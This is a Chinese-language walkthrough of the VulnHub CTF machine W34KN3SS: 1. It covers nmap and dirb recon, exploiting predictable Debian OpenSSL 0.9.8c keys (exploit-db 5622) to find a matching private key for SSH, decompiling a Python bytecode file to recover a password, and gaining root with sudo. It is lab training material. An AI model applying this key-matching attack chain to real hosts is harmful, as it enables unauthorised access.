OSCP难度靶机之W34KN3SS: 1

admin 2022年11月7日22:17:46安全文章评论10 views1569字阅读5分13秒阅读模式

虚拟机信息:虚拟机下载地址:https://www.vulnhub.com/entry/w34kn3ss-1,270/虚拟机简介:你的目标是帮助 neo 以“root”身份访问这台机器目标:1个flag级别:中级

1、信息收集

1.1通过arp-scan检测主机IP地址

arp-scan 192.168.207.0/24

OSCP难度靶机之W34KN3SS: 1

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.134

查看开放22、80、443端口

OSCP难度靶机之W34KN3SS: 1

2、渗透测试

2.1 WEB渗透

1.站点访问测试

访问站点显示Apache默认页面

OSCP难度靶机之W34KN3SS: 1

使用dirb进行网站目录扫描,发现test目录可以访问,没有发现有用信息

dirb http://192.168.207.137

OSCP难度靶机之W34KN3SS: 1

OSCP难度靶机之W34KN3SS: 1

2.绑定域名测试

通过nmap端口扫描,发现443端口提示有域名信息,可以绑定hosts访问

OSCP难度靶机之W34KN3SS: 1

vim /etc/hosts

OSCP难度靶机之W34KN3SS: 1

访问网站首页,发现有一个提示信息

OSCP难度靶机之W34KN3SS: 1

重新使用dirb进行扫描,发现有隐藏目录

dirb http://weakness.jth

OSCP难度靶机之W34KN3SS: 1

3.信息收集

访问爆破目录,发现有两个文件信息

OSCP难度靶机之W34KN3SS: 1

在note.txt中提示密码为0.9.8c-1创建的密钥

OSCP难度靶机之W34KN3SS: 1

OSCP难度靶机之W34KN3SS: 1

4.漏洞利用

使用searchsploit搜索相关漏洞

searchsploit openssl 0.9.8c-1

OSCP难度靶机之W34KN3SS: 1

复制漏洞信息到当前路径下

searchsploit -m 5622
cat 5622.txt

OSCP难度靶机之W34KN3SS: 1

下载密钥文件并解压,通过获取到的mykey.pub内容进行对比

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
tar jxvf 5622.tar.bz2
cd rsa/2048
grep -r -l "AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw=="

OSCP难度靶机之W34KN3SS: 1

2.2 主机渗透

1.通过密钥连接

ssh -i 4161de56829de2fe64b9055711f531c1-2537 [email protected]

OSCP难度靶机之W34KN3SS: 1

发现本地目录中存在2个文件,其中code为python2.7生成的文件

OSCP难度靶机之W34KN3SS: 1

2.下载并解析文件

把python文件复制到www目录中进行下载

cp code /var/www/html
wget http://192.168.207.137/code

OSCP难度靶机之W34KN3SS: 1

OSCP难度靶机之W34KN3SS: 1

安装解码库,并解析python代码文件

pip2 install uncompyle6
cp code code.pyc
uncompyle6 -o . code.pyc

OSCP难度靶机之W34KN3SS: 1

OSCP难度靶机之W34KN3SS: 1

已重新生成新的py文件

OSCP难度靶机之W34KN3SS: 1

3.分析python代码

代码中通过用户名和密码生成HASH文件,获取到用户名为:n30,密码为:dMASDNB!!#B!#!#33

cat code.py

OSCP难度靶机之W34KN3SS: 1

4.查看sudo权限

当前用户拥有所有的sudo权限

sudo -l

OSCP难度靶机之W34KN3SS: 1

可以直接获取到获取root权限

sudo -i

OSCP难度靶机之W34KN3SS: 1

5.查看FLAG

OSCP难度靶机之W34KN3SS: 1

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之W34KN3SS: 1

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月7日22:17:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  OSCP难度靶机之W34KN3SS: 1 http://cn-sec.com/archives/1394344.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: